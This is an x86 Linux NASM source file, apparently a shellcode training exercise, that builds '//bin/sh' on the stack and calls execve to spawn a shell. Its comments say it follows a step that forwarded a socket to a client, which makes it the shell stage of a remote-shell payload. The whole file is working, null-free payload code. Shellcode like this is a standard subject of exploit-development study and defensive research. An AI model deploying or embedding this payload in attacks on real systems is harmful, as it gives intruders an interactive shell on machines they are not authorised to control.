; This program is free software: you can redistribute it and/or modify
; it under the terms of the GNU General Public License as published by
; the Free Software Foundation, either version 3 of the License, or
; (at your option) any later version.
;
; This program is distributed in the hope that it will be useful,
; but WITHOUT ANY WARRANTY; without even the implied warranty of
; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
; GNU General Public License for more details.
;
; You should have received a copy of the GNU General Public License
; along with this program. If not, see .
; Filename: execve-stack.nasm
; Author: Andrey Arapov
; 2013 March
global _start
section .text
_start:
;
; =============================== EXECVE =====================================
;
; Now as we forwarded sockfd to a client, we can spawn shell.
; Prepare the path, in little-endian, using the Python
; >>> '//bin/sh'[::-1].encode('hex')
; '68732f6e69622f2f'
;
; int execve(const char *filename, char *const argv[], char *const envp[]);
; EAX EBX, ECX, EDX
; 11 '//bin/sh' PTR to EBX NULL
;
;
; EAX
xor eax, eax
mov al, 11 ; execve syscall
; EBX
xor edx, edx
push edx ; NULL termination of '//bin/sh' string
push 0x68732f6e ; '//bin/sh' in reverse
push 0x69622f2f ; beginning of '//bin/sh' string is here
mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
; ECX
push edx ; NULL termination of a stack
push ebx ; load our '//bin/sh' on a stack
mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
; EDX
push edx ; NULL terminator
mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
int 0x80
; === EXIT(0) ===
; void _exit(int status);
; /usr/include/asm/unistd_32.h:#define __NR_exit 1
xor eax, eax ; EAX = 0x000000
mov al, 1 ; EAX = 0x000001 1: exit syscall
xor ebx, ebx ; EBX = 0x000000 0: success status
int 0x80
;section .data